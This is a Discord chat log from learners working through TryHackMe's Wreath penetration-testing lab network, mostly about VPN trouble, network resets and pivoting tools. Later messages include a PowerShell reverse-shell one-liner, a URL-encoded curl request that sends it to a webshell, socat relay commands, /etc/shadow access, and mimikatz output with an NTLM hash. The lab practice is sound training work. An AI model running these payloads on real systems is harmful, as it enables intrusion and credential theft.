#wreath-network

1 messages Β· Page 15 of 1

ancient oasis
#

wasn't the breakpoint 9999 for non-root users?

#

or was it 999

knotty forge
#

no 15000

lusty saffron
ancient oasis
#

oh, so specifically for wreath

lusty saffron
ancient oasis
lusty saffron
#

BTW, for Kali after a recent update.
That limited was removed.

knotty forge
#

πŸ₯²

ancient oasis
knotty forge
ancient oasis
#

so now any other user can user port 80 and the like?

knotty forge
#

yeah now it worked

#

it worked finally

#

thx for you support

merry robin
#

Yeah, because elephants with no sense of subtlety coming at it from an individual CTF environment kept overwriting the bloody thing because they didn't realise it was destructive

#

Can't remember if I did the id_rsa file as well, but either way it's unlikely to get updates anytime soon

knotty forge
#

yes you did

#

i tried it

#

but for some reason back when i did it the first time it was completely fine copying it from the nc reverse shell and this time it didnt work

ancient oasis
#

strangely, when I completed wreath, I didn't run into any issues that needed resets, guess trolls have increased

knotty forge
#

somebody shutted down the prod server once

small sapphire
cedar rock
#

This port forwarding/proxying stuff is making my head spin lol, been sticking with it and have decent notes but when it finally comes to running the commands so that I can ping the internal machine from my Kali VM im so lost, is there a video walkthrough of this room where they show the commands being run in the various shells/terminals to finally have internal access? Not looking for the one already provided where they really only read the prompts

remote harness
#

hello guys

#

can someone help me in this lab?

#

Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?

#

I've tried all possible ways and I didn't get an answer.

#

windows fundamentals 1

#

exercice 3

strange bison
#

@remote harness This channel is for the Wreath network on tryhackme. Please use #room-hints

elder acorn
#

Hey guys

#

Im currently on the web exploitation task, ive successfully gained a reverse shell from the server as root

#

A question requires me to submit root user's password hash, but when i submit it, it says wrong answer

#

I cant think of what went wrong since i have a stable reverse shell with root privileges and cat /etc/shadow works just fine, but the question is not accepting the answer

elfin trout
#

Struggling alot with SSH on the first compromised machine. Gives me error:
Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
I've copy pasted the SSH key, and made sure that there are no extra spaces inside of it multiple times.
I've tried making a new user on the machine, and SSH-ing to it, but it still won't work.

elfin trout
#

i fixed it:

  1. Make new file: authorized_keys2
  2. Copy paste id_rsa.pub into it
  3. Nano /etc/ssh/sshd_config
  4. Change AuthorizedKeysFile to .ssh/authorized_keys2
  5. systemctl restart sshd
merry robin
elfin trout
#

can i change the /etc/ssh/sshd_config file to authorized_keys to fix it again? .__.

#

i mean, i couldnt really find another fix, i've had this problem the last 2 days now

#

i've voted for a reset πŸ‘

grizzled prairie
#

Hey there, hope everyone is healthy. I need help regarding the network - When I start the network (like I did 10 minutes ago) and waiting for 5+ minutes for services to be run completely, scanning the IP and I found that port 10000 is not open. This thing is repeating on my end. Am I making some mistake? Please help, thanks.

#

Scanned the port but it seems to be closed.
P.S. I am already connected to network ovpn file.

cedar rock
cedar rock
#

So Im trying to get thru the pivoting section but Im unsure of rlly what to do I have all my notes but when it comes to actually pivoting and hitting the internal network im a little lost still. I understand there's basically proxying and then there's port forwarding. Im assuming for this room proxying is preferable since we can send all types of traffic thru a proxy as opposed to just a single ports worth of traffic would this be correct? Like for example, Okay, I have my shell on the compromised server, now I want to get some enumeration goin to see whats on the internal machine, but nmap wont work thru a proxy, and I dont want to setup a port-specific port forward because I dont actually know whats running on the internal server yet, what's the general first step here ? Setup a proxy and then manually enumerate if that makes any sense?

#

Ahh alright I read ahead now an I see the 'intended action' is to get your proxy/portforward setup and THEN upload an nmap binary to the target to scan

cunning island
#

anyone suddenly unable to work on Wreath?

#

anyone alive?

surreal sail
#

hey guys, 404 page found when i wanna download my wreath-vpn file.

strange bison
surreal sail
#

sorry dude, but that's not working. i tried twice. (leave room, rejoin the room, download configuration file, regenerate, but 404 not found). Should i have vpn file that machine's vpn file to access wreath network? I didn't understand.

cunning island
#

I still can’t any machines to respond after being halfway through the room

urban vortex
winter lintelBOT
#

Gave +1 Rep to @urban vortex

urban vortex
cunning island
#

Yeah I tried that. It says it’s running, but I get to route to host

#

And machines don’t respond

blazing rock
cunning island
#

Interestingly, I can’t see the gateway anymore either

urban vortex
cunning island
#

that's a good idea, but i've tried that a few times

urban vortex
#

Hm, I did notice a issue with mine not being able to run the exploit on the first machine. But that is all I can think of sorry I can't help more

cunning island
#

yeah no worries

#

i really think it's their end, because the VPN dies by itself after a while

urban vortex
#

It could be someone else in the network that touched something they shouldn't of. I did notice some ports open that weren't suppose to be so theres that too

cunning island
#

that's my guess

#

it's possible someone's being a jerk

urban vortex
#

Can always vote for a reset as well or just wait it out for a bit, try again later

cunning island
#

i read on reddit it happens

#

well, that's what im doing... letting the timer run out.. it's got 26min to og

#

@blazing rock you must have a power tool for this? Or may be Al? πŸ˜‚

#

(sorry, i miss home improvement.)

blazing rock
#

Gives a whole new meaning to PowerShellℒ️

cunning island
#

hahhahahaha

#

awesome

urban vortex
#

In the mean time you could try some other online rss to break into while you wait

cunning island
#

yeah, i just had lunch and sipping a coffee while reading

blazing rock
#

The timer on a network is different from a single room. It does not terminate the network when it runs out, it puts it to sleep (stopped, safes the network state). A Reset would be needed to get the network in your subnet back to its original state. πŸ™‚

cunning island
#

oh no... what can i do?

#

... to effect a reset for the room or myself?

urban vortex
winter lintelBOT
#

Gave +1 Rep to @blazing rock

blazing rock
#

Hit the Reset button for the Network to reset, when it reaches the required number.

cunning island
#

that's helpful; but it means i am dead in the water for the forseeable future

strange bison
strange bison
urban vortex
#

That is what Muiri told me to do, but originally I tried waiting 10-20 minutes it didn't work, then after the weekend I came back on sunday night and it worked. Not sure if it had went through a reset at that point or not but it took some time

cunning island
blazing rock
#

We're looking into changing the reset requirement for Networks, but that does not help you at this moment. πŸ˜„

urban vortex
#

that vote is for everyone working in the room right? So 6 different people have to vote or you vote 6 times yourself over 36 hours?

blazing rock
#

Are you in 10.200.8.x?

cunning island
#

i am 10.200.105.x

surreal sail
#

i'm not in 10.200.x tunnel. but i can add a vote for reset

strange bison
blazing rock
#

105 holy moses. That's a lot of networks πŸ˜„

strange bison
#

Otherwise you're resetting a network without cause

strange bison
urban vortex
surreal sail
cunning island
#

2/8

#

so we're all on different subnets lol

#

can you still connect to your vpn?

urban vortex
cunning island
#

neat. mine connect now.

#

it authenticates and then stops... hmmm..

urban vortex
#

Could attempt to download a new config file and see if that fixes it

cunning island
#

yeah, ill try that again

blazing rock
merry robin
#

It is across all networks, yes

#

Wreath subnets start at 72 and go up to 120 or something iirc

cunning island
urban vortex
#

Wreath got me stressing at some moments but overall very informative

merry robin
#

At some point I may see about updating it. I also have an additional "ultimate" pivoting technique that I couldn't really use in Wreath, but that I'm now good enough with docker to containerise

lusty saffron
merry robin
#

If I get a weekend I'll add that as a standalone extension I think.

cunning island
#

any ideas on these technical issues?

merry robin
urban vortex
#

Ultimate pivoting aye? Do tell πŸ‘€

merry robin
blazing rock
#

10.200.8.x 😎

cunning island
merry robin
surreal sail
blazing rock
merry robin
lusty saffron
merry robin
cunning island
#

that sounds fascinating

merry robin
#

No actual tools involved. Just networking knowledge.

urban vortex
#

Ah, my mistake, still learning lol

merry robin
#

Nah, no mistake πŸ˜„

urban vortex
#

Now you got me curious and googling some UDP things

#

yeah nah

surreal sail
urban vortex
surreal sail
#

after that i rejoined in but not working.

cunning island
#

there really needs to be a master reset button

surreal sail
#

i will try last time for leaving and rejoining?

cunning island
#

because at some point this gets impossible to troubleshoot when you're not even sure if the system is working.. at least with a reset you get a baseline

strange bison
cunning island
#

so it's hard to know whether our issues are our own, or the networks, or both. It sounds like consensus is that it's the network.

strange bison
#

You're on different networks.

#

-ban @arctic sluice -ddays 1 Nitro Scam

winter lintelBOT
#

πŸ”¨ Banned 4stro__#9323 indefinitely

urban vortex
#

James quick with the hammer

cunning island
#

that too, makes it even harder

cunning island
winter lintelBOT
#

Gave +1 Rep to @urban vortex

cunning island
#

probably malware

strange bison
#

It definitely is.

cedar rock
#

Hey so I just ran my nmap scan from the first compromised webserver, I see 5 machines up via the nmap -sn scan but the question wont accept my answer? is there something I did wrong here

cunning island
#

oh, there are some you need to skip

cedar rock
#

Says the network diagram up top is a giveaway but then why am I seeing 5 hosts up

#

Oh really

cunning island
#

because they are out of scope

cedar rock
#

ohhhh

cunning island
#

man, yours is working! im so jealous lol

merry robin
merry robin
cunning island
cedar rock
#

once the work day ends and I get on THM I just assume all machines are in scope lol

cunning island
cedar rock
#

my b

merry robin
cunning island
merry robin
#

I obviously couldn't perfectly emulate a real pentest, but it's designed to simulate one in many ways (the writeup format rules, for example)

cedar rock
#

Right right I understand

cunning island
#

and the out-of-scope part seems realistic

surreal sail
winter lintelBOT
#

Gave +1 Rep to @urban vortex

urban vortex
cunning island
#

for fun, i tried it from two other machines.. just to be sure it wasn't my vm. definitely an issue with the room. someone tampered.

blazing rock
surreal sail
blazing rock
surreal sail
winter lintelBOT
#

Gave +1 Rep to @blazing rock

blazing rock
cunning island
#

do you have time to take a peek at the 10.200.105.x?

blazing rock
cunning island
#

You’re amazing

blazing rock
#

I remember that episode.

cunning island
blazing rock
#

My hair almost caught on fire.

naive timber
#

Hey all. Apologies if this is rambly nonsense. I finished Wreath last week and had some questions about how the network is structured. (Potential spoilers ahead!)

The image linked represents the different communication channels I had to each machine at the end of Wreath.
I was wondering what mechanism was preventing direct access to ||wreath-pc from the prod-server? (As traffic had to be tunnelled through git-serv).||. Similarly, that mechanism seemed to operate only in one direction? As at the very end, ||we are able to establish a reverse shell from wreath-pc straight back to our attacking machine, which is in an entirely different (sub)net!?|| Was it just routing rules on 10.200.x.1?

I'm a networking noob so any explanation is appreciated. Cheers!

P.S. the network was a fantastic learning experience, thanks @merry robin.

winter lintelBOT
#

Gave +1 Rep to @merry robin

merry robin
naive timber
merry robin
#

Kinda.
The best way to think of it from a "real" perspective would be to have the prod server in a DMZ segregated by a hardware firewall allowing access exclusively to the git server in the internal network. Then the git server and pc in a LAN together behind said firewall.

#

If I was building the same network locally, that's how I would do it, personally πŸ€·β€β™‚οΈ

naive timber
#

Yep, perfect, that connected the dots

#

Thanks @merry robin!

winter lintelBOT
#

Gave +1 Rep to @merry robin

merry robin
#

Np :)

grizzled prairie
paper valve
#

I just started the room. However, the attack box can't even ping the server IP provided. I tried downloading the openvpn config file. But it just returns a 404 and wont actually download. Is there something wrong with the server or did I just miss something?

cunning island
cunning island
#

have you tried the vpn profile for wreath in that foldeR?

#

just curious... i get this error when running socat "error while loading shared libraries: libwrap.so.0: cannot open shared object file: No such file or directory" is that fatal for socat?

wide tartan
#

Hello anyone who are doing wreath .
I am login in the vpn area of wreath and can't ping the 10.200.90.200 IP
it doesn't respond to my nmap scan anymore
i try to comment the line in /etc/hosts but nothing
anyone have a clue ?

cunning island
#

can you copy+paste what you're seeing?

#

@wide tartan

lusty saffron
cunning island
wide tartan
cunning island
#

sudo apt update && sudo apt install flameshot

#

it's available for windows and macos too

wide tartan
#

yes iI was installing during this time ahah

cunning island
#

ok that looks ok

#

oh, its commented out

wide tartan
cunning island
#

ok vpn is good

wide tartan
#

Yes i comment it on purpose

cunning island
#

ok, that's alright

#

and when you ping the ip, what happens?

wide tartan
#

ok i don't what happened before

#

now it works

#

lmao sorry for wasting your times

cunning island
wide tartan
#

I don't know what happened before

#

my etc host was not commented

#

and it was unreachable

cunning island
#

πŸ€·β€β™‚οΈ that's technology. sometimes we never know why things happen.. it's the trying to learn that matters πŸ™‚

wide tartan
#

hahaha I agree on the learning point

lusty saffron
#

Perhaps, the network was sleeping πŸ˜…

wide tartan
#

It can happened ?

lusty saffron
#

It is possible, it might have been the case for your previous try

wide tartan
#

I don't really get how works the network area

#

like if there is no hacktivity

#

the vm shutdown

cunning island
lusty saffron
#

Make sure the network is in Running state while working on it and keep extending it's time if you are working on it

cunning island
wide tartan
#

Yes I have checked it and i t was Running

lusty saffron
#

+rep @cunning island blobfingerguns

cunning island
#

always dude

winter lintelBOT
#

Gave +1 Rep to @cunning island

cunning island
#

+rep @lusty saffron

winter lintelBOT
#

Gave +1 Rep to @lusty saffron

cunning island
#

thanks for the static binary thing

#

i actually laughed outloud lol

#

totally what i get for being lazy lol

lusty saffron
#

Haha, I now keep a bunch of static binaries laying around.
socat, nmap, chattr, ...blobfingerguns

cunning island
#

yeah, that's clever

oblique oar
cunning island
#

+rep @oblique oar

winter lintelBOT
#

Gave +1 Rep to @oblique oar

cedar rock
#

Did we reach 13 votes on the 10.200.90 network or did the network just drop?

#

I was in the middle of setting up the reverse shell relay and it just goes down, I get that if it detects no network activity itll go to sleep but im like actively working on it lmao

merry robin
cedar rock
merry robin
#

-ban 823910237664706640 -ddays 1 Nitro scam

winter lintelBOT
#

πŸ”¨ Banned 823910237664706640 indefinitely

lusty saffron
#

@fair breach Sorry, but it didn't work.
You used --ddays and ddays, didn't Muiri check itπŸ˜„

fair breach
#

Yeah I was on mobile cycling down a road at the same time

#

dodging all sorts of wasps and flys LOL @lusty saffron

#

ty for ping

cedar rock
#

Can we please get an extension on 10.200.90.0 network? Im in the middle of C2 stuff and there's 12 min left on network and it wont let me extend the time

hollow violet
#

Hello everyone! Im stuck on Git Server Stabilisation & Post Exploitation. Can't rdp to git server πŸ₯Ί

tawdry ingot
#

Hello folks! I'm on task 6 trying to exploit the machine, but it gives me an error "Failed to connect". I checked the IP address and tried to ping and it works. Why does it fail?

scarlet prawn
#

Click the start button

#

The machine is stopped

tawdry ingot
#

Is it? For me its up

tawdry ingot
#

It's working now. Still don't know what was the issue, but it's fine πŸ™‚

hallow merlin
#

Hi there, I am using proxychain with ssh -D 9050 to scan the .150, didn't get any open ports found. Anyone has the same issues as me?

zinc sphinx
#

Anyone know how to resolve a 404 error everytime I try to download wreath network vpn config file?

hollow violet
#

Can please someone help me? I'm stuck on getting rdp to the git server

#

connection lost 😦

hallow merlin
#

HI there, I am currenlty using proxychains dynamic port forwarding method to do the boxs, any idea how I can run the exploit? if I am using proxy chain

cedar rock
#

Hey all, trying to run mimikatz on the git-serv machine and everytime I run it using . ./mimikatz.exe it just spams out and im not sure how to get it under control here.

merry robin
#

Why do you think you were told to use RDP?

cedar rock
#

I was trying other options

merry robin
#

Evil-WinRM shells are pseudoshells -- they're simulated. That has some... interesting... side effects. You can get around it by entering the commands as arguments to the binary, although it may still be a little strange

cedar rock
#

Ahhh hmmm alright

#

Well I would prefer to use RDP but kept getting a connection failed error so I defaulted to evilwinRM, didn't realize that would be an issue

cedar rock
merry robin
#

Could try PsExec, although that isn't an interactive shell either. Also can't remember if I left SMB open or not

#

The other problem with PS Remoting is that it tends to execute commands in a medium integrity process if you're not using the default Administrator account. PsExec gets around that at least

worn tulip
#

Hello. I bought 1 month subscription from Tryhackme site. My card was charged but it seems that I am not a member

#

help me!

merry robin
#

!email

thin crescentBOT
#
TryHackMe
Contact us for support, teaching enquires and more!
cedar rock
merry robin
#

Nah, I removed the limit

#

Will depend on what the error is

cedar rock
#

oh wait im so dumb

#

I used the wrong IP

#

lmao

merry robin
#

That would do it

cedar rock
#

I knew it

#

god damn facepalm

cedar rock
#

Hey so just FYi, the wreath room accepted my Admin NTLM hash answer as the correct answer when it had a typo in it, just wanted to bring it up, had me stumped for some time until I realized it

lusty saffron
ancient oasis
#

95% tolerance IIRC

cedar rock
#

Ahhh alright

#

I was not aware

hallow merlin
#

$client = New-Object System.Net.Sockets.TCPClient('10.200.101.200',16001);

New-Object : Exception calling ".ctor" with "2" argument(s): "No connection could be made because the target machine
actively refused it 10.200.101.200:16001"

Hi there, I am trying to set a reverse shell with Powershell but the 1st line didn't work for me.

I have already done the following in centos machine
firewall-cmd --zone=public --add-port 16001/tcp

hallow merlin
#

ssh -R 10.200.101.200:16001:127.0.0.1:4444 -i id_rsa root@10.200.101.200
[root@prod-serv ~]# netstat -tlpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN 1827/perl
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 853/sshd
tcp 0 0 127.0.0.1:16001 0.0.0.0:* LISTEN 2121/sshd: root@pts

Anyone know how to make the one in bold 0.0.0.0

hallow merlin
zinc sphinx
#

So I’m evil-winrm into .150 and I’m trying to download Website.git to my local machine and it saying it downloads but then it’s nowhere to be found on local.

#

Anyone run into this issue?

hallow merlin
#

**What is the Administrator password hash? 8846f7eaee8fb117ad06bdd830b7586c
**
For one of the question I entered the hash correctly but it still mention it is wrong?

mimikatz(commandline) # lsadump::sam
Domain : GIT-SERV
SysKey : 0841f6354f4b96d21b99345d07b66571
Local SID : S-1-5-21-3335744492-1614955177-2693036043

SAMKey : f4a3c96f8149df966517ec3554632cf4

RID : 000001f4 (500)
User : Administrator
Hash NTLM: 8846f7eaee8fb117ad06bdd830b7586c

hallow merlin
cedar rock
zinc sphinx
#

I did I believe my command was: download Website.git /home/user/wreath

strange bison
zinc sphinx
winter lintelBOT
#

Gave +1 Rep to @strange bison

late moon
#

hi there :), i need help with task 17. im trying to upload the static nmap binary to the first machine but without success... each time im getting the error "failed to execute command", i tried to follow the guide and even other techniques but nothing seem's to help. i saw some answer of someone that say's that this error happens if you dont upgrade the shell to an interactive one, but when i try to upgrade it with python3 -c 'import pty; pty.spawn("/bin/bash")' it gives me the same error:(. im very tired from this issue and i will really appreciate some help.πŸ™Œ

urban vortex
#

So my wreath network ran out of time, i restarted the timer, and now I cannot even ping the first host. Does anyone else have his issue?

late moon
urban vortex
late moon
#

on task 6

#

the webmin server

urban vortex
#

so you ran the initial CVE exploit, typed "shell" and connected to your kali or attacking machine yes?

#

for a while I was getting the "failed to execute command" as well actually and I just had to restart the whole VM, reconnect and give it some time in order for it to work properly. Its the same issue I am having now actually

late moon
#

thanks for the help btw πŸ™‚

urban vortex
#

well actually do you have the rsa key to the first machine?

late moon
#

i dont think i have it...

#

i just dont understand why it isnt working like the guide, it must be some sort of bug

urban vortex
#

the network can be funky sometimes. sometimes all you can do it wait it out and give it some time which what im currently doing

#

try to let the timer run out without being connected to the vpn, then restart the network and reconnect with the VPN. That seems to fix most of my issues

late moon
#

@urban vortex man your the best!!! you just solved my problem

#

thank you so muchhhh

urban vortex
#

Glad I could help

urban vortex
late moon
#

i cant believe it was that simple lol

urban vortex
#

ah okay lol it happens well if ya get stuck again ill be around im on task 32 right now waiting it out

late moon
winter lintelBOT
#

Gave +1 Rep to @urban vortex

late moon
coral geyser
#

@stoic flicker @merry robin

stoic flicker
#

-ban 155098424910282753 -ddays 1 discord nitro scam

winter lintelBOT
#

πŸ”¨ Banned γ€Žα—ͺᙒ』Ghony#5788 indefinitely

cedar rock
#

Hey all, trying to pivot into the final Personal Machine. I have my notes on setting up a chisel forward proxy and I've set a port on the gitserver firewall to allow traffic. I think Im just having a little trouble understanding which port needs to go where. Heres some output of what I have right now

#

Chisel client

#

Chisel server (gitserver) Listening on port 22123 which I opened on the firewall

#

Here's my foxyproxy settings but I still cannot hit the personal PC's webserver on 80

#

Im not sure that my command for the chisel client is correct the syntax , based off my notes is ./chisel client TARGETIP:LISTENPORT PROXYPORT:socks I used 22123 both as the listen port and proxy port, I wasn't sure if the proxy port was arbitrary or if it needed to be the same as the listening port since 22123 is what I opened on the firewall

#

So from my perspective, I believe the chisel server is setup right, listening on port 2213. Then I successfully connected my chisel client. that is connected. But I think either my proxy port is wrong + my foxy proxy settings are wrong. Is the proxy port arbitrary?

#

So I changed the foxyproxy IP to that of the Gitserver, and I was able to load a page but this doesn't seem like the right thing. Something must be off here right?

#

Alright the issue seemed to be my proxychains4.conf. not sure why mine is called proxychains4.conf when every example I see its just 'proxychains.conf' So I changed the name of mine to match. Also since the current directory is the first place that proxychains looks for proxy configs, I've copied proxychains.conf to my working dir (where Im running chisel client from) Ive setup my foxyproxy to socks5 on 127.0.0.1:1337. My proxychains.conf file is below. However, with all this set I still cannot hit these webserver on 80??

#

I can ping 10.200.96.100 from my local kali terminal but I cannot get access the webserver on 80 still hmmmm

#

I got it!

#

Oh my goodnes lets gooo haha

#

sry for everyone that has to read this gibberish. I would delete but It's important to see that 1. I failed to type 1337 in for the PROXYPORT in the above command. 1337 is the port that is configured in proxychains.conf. Make sure your proxychains.conf file looks like mine there and then make sure you make a new foxyproxy proxy. Make sure you choose the proxy type as SOCKS5. I made the mistake of just arbitrarily naming mine "SOCKS5" so dont doo that lol

cedar rock
#

Just completed wreath! woooo

#

Only too like what, a week and a half. Studying after work and over the past weekend. I'll be honest I didn't do most of the bonus questions only because I knew they would send down a rabbit hole that was way too long. But otherwise I tried to stay tru to the room. My main goal was to just get a basic understanding on how SSH tunelling works and it overall was a good experience seeing myself pivoting thru 2 machines!

zealous escarp
#

can anyone help me reset the wreath network pls

strange bison
#

The third octet of the machine IPs

late moon
#

hi guys, im trying to use sshuttle to connect to the second machine in task 18.
i tried it myself with no success so i saw the youtube walkthrough of DarkSec and he used this command:
sshuttle -r root@10.200.87.200 --ssh-cmd "ssh -i id_rsa" 10.200.87.0/24 -x 10.200.87.200
i tried to do the same thing but i got this error:
Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found.
fw: Received non-zero return code 1 when flushing DNS resolver cache.
^CFailed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found.
fw: Received non-zero return code 1 when flushing DNS resolver cache.

i tried to flush my dns records but with no success either, im using kali linux and i saw flushing tutorial's for ubuntu and red hat and it didnt work.
if someone knows what the problem here and can help me fix it it will be great πŸ™‚
thanks in advance

#

i saw i can flush dns records in the browser as well, do you guys think it will help me in this case

#

?

ancient oasis
#

@strange bison

strange bison
#

-ban @surreal sail Game phishing. Secure your account and then appeal this ban by emailing bans@tryhackme.com

winter lintelBOT
#

πŸ”¨ Banned Willy12u#8465 indefinitely

limber bronze
#

anyone with clues about why it asks for a password when provided with a key at the first machine?

strange bison
#

Show your command please

sturdy cypress
#

Usually the key file has wrong permissions or format.

limber bronze
strange bison
#

Someone might have removed the key too

limber bronze
#

i just checked that the file is on the server

#

can it be because i just copy pand paste the file? shouldn't be the problem right

strange bison
sturdy cypress
limber bronze
#

ok because it's the id_rsa i need on my end, right? not the .pub?

split harbor
#

yeah.... but you should check the authorized_keys file as that one determines if your private key allows you access

limber bronze
#

alright, are the id_rsa.pub supposed to be identical to the one in authorized_keys? because right now it's not

split harbor
#

think so yeah

#

just also think it is supposed to be able to hold multiple keys in that file

#

so make sure that you only add the key instead of wiping the contents of the authorized_keys file

limber bronze
#

well since i can't change it then how could somebody else o_O

strange bison
late moon
#

maybe something is wrong in the room itself?
im having the same problem i just cant make an sshuttle connection to the machine and even if i just try to ssh to the compromised server with ssh 10.200.87.200 -i id_rsa im getting this error: root@10.200.87.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

strange bison
late moon
late moon
#

actually my key is identical so i dont need to change the authorized keys file, but it still doesnt work...

strange bison
late moon
#

the public key is in the authorized keys file

late moon
#

it a shame a really wanted to complete this room, saved up 7 day streak to get it...

strange bison
#

Yes, it's very common

#

Like I said, reset the network.

late moon
strange bison
#

You can add a vote every hour.

late moon
winter lintelBOT
#

Gave +1 Rep to @strange bison

silk elm
#

Hello I am not able to download the vpn connection pack to the wreath network

#

I get a 404 when I try to download it

#

I’ve joined the wreath network and everything

silk elm
#

Still not able to download the vpn file for the wreath network

urban vortex
#

You gotta leave the wreath room, and give it some time like at least 30 minutes to an hour and then re join the room and try to download again

silk elm
#

Okay I’ll give that a go

#

Thanks for the help

#

That let me download the config file

#

Random… but I appreciate it

urban vortex
#

its a weird fix but its like giving a reset to the connection of it for some reason

hallow merlin
#

CommentType a password for the user: Retype the password to confirm: i am getting this output on the webshell console

silk elm
#

Anyone else having issues with the id_rsa permissions when trying to ssh with it

#

I’ve done this tyoe of persistence previously so I know my steps are solid

#

But I get a permission error

#

I’ve done chmod 600 id_rsa and stuff

#

Steps have been followed to the T and still errors

cursive minnow
#

@stoic flicker @merry robin

stoic flicker
#

-ban 473211379151536149 -ddays 1 Your account may have been compromised by a nitro scam, and is now attempting to scam others. Please change your passwords and add multi-factor authentication before emailing bans@tryhackme.com if you wish to return.

winter lintelBOT
#

πŸ”¨ Banned shimmy shimmy ya#8721 indefinitely

stoic flicker
winter lintelBOT
#

Gave +1 Rep to @cursive minnow

cursive minnow
hallow merlin
strange bison
# hallow merlin chmod 600 id_rsa

If the key has the wrong permissions, you get a giant banner telling you that.
Permission denied by the remote server does not mean wrong permissions on the key on your local machine.

#

-ban @still maple -ddays 1 Scam links

winter lintelBOT
#

πŸ”¨ Banned rodri_silva18#4667 indefinitely

ancient oasis
#

@strange bison

strange bison
#

-ban @slim eagle -ddays 1 Your account has been compromised and is being used to send phishing scams. Please secure your account and then appeal this ban by emailing bans@tryhackme.com

winter lintelBOT
#

πŸ”¨ Banned Sunderw_3k#7418 indefinitely

silk elm
#

I’ve done this type of attack before and chmod 600 id_rsa is what I’ve usually done and also what is said to be done for this challenge as well

#

@hallow merlin I’ll give your method a go in a bit

late moon
#

guys for some reason i cant get a connection to the machine's in the network

#

i tried to ping 10.200.57.200 but with no success, i have restarted today the network and i used the vpn file and i saw the the netwrk is up for half an hour but still i cant even ping the first machine for some reason...

#

earlier today i did manage to connect to the network and i got to task 22 but now i just cant manage to connect again to any machine

silk elm
#

after the network was restarted the ssh portion works now... just an FYI

hallow merlin
#

The method I used"

  1. Go to access 2: Regen VPN 3. Download again, incase of any issue in connectivity
elder acorn
#

Hey guys, I'm currently in the task GitServer-Exploitation, leading upto this, i have all the required ssh keys and the correct exploit for the next attack. But due to some reason, the python exploit fails and it says the following:
+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository test.txt
[+] Add user to repository
[-] Cannot add user to repository
I've cross checked every instruction from the above task and I've also watched the video walkthrough attached to it. They all are getting shell easily, But my exploit fails. Can anyone help me with that?

#

This is the full output:
──(kaliγ‰Ώkali)-[~/ctf/TryHackMe/Wreath]
└─$ ./*****.py
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository test.txt
[+] Add user to repository
[-] Cannot add user to repository

pliant kelp
#

Working through Wreath and trying use Burp to get the reverse shell from X.X.X.200 to X.X.X.150. Converted Powershell command using Ctrl + U yet I am not able to catch a reverse shell. Ncat shows it's listening on same port as in Burp script and only changed IP and Port. Any suggestions?

urban vortex
elder acorn
winter lintelBOT
#

Gave +1 Rep to @urban vortex

silver jewel
#

i can't download the wreath vpn key.. getting a 404 on the download page.. anyone have this issue ?

strange bison
#

@merry robin I really think troubleshooting needs to be pinned for this

merry robin
#

I really think it needs fixed

#

But by all means, you'll know the troubleshooting better than I do

strange bison
merry robin
#

I believe so

faint flare
sharp ice
carmine wasp
#

Good evening.

I'm currently on Task 20 and I can get the reverse shell to work with the "Port Forwarding -- Easy" technique. Now I try to use the "Port Forwarding -- Quiet" technique but I can't get it to work.

On kali I do :
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &

On prod-serv (10.200.181.200) :
./socat tcp:ATTACKING_IP:8001 10.200.181.150:80,fork &

curl -X POST http://10.200.181.150/web/exploit-toto.php -d "a=powershell.exe%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.200.181.200%27%2C80%29%3B%24stream%20%3D%20%24client. GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream. Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System. Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29. Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22"

Git-Server (10.200.181.150)

Is there a kind soul to help me ? πŸ˜„

urban vortex
wide tartan
#

Hello

#

i am looking for some help during the pivoting task i test sshustle / chisel / and socat and it won't work any idea ?

strange bison
#

How are you testing them and what's not working exactly?
I found sshuttle to be the easiest

wide tartan
#

sshuttle -r root@10.200.87.200 --ssh-cmd "ssh -i web_server_id_rsa_root" -N -x 10.200.87.0/24

c : Connected to server.
Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found.
fw: Received non-zero return code 1 when flushing DNS resolver cache.
This is my command for sshhuttle

#

i am doing this from my kali machine

carmine wasp
# urban vortex make sure your porwershell command is set up correctly cause your socat commands...

Thanks for your help ! πŸ˜„ I use the ps script proposed by THM :

powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding). GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text. encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

I run it from the prod-serv and use curl with -X POST and http://10.200.181.150/web/exploit-toto.php

For your information, here is a diagram of my configuration

winter lintelBOT
#

Gave +1 Rep to @urban vortex

carmine wasp
#

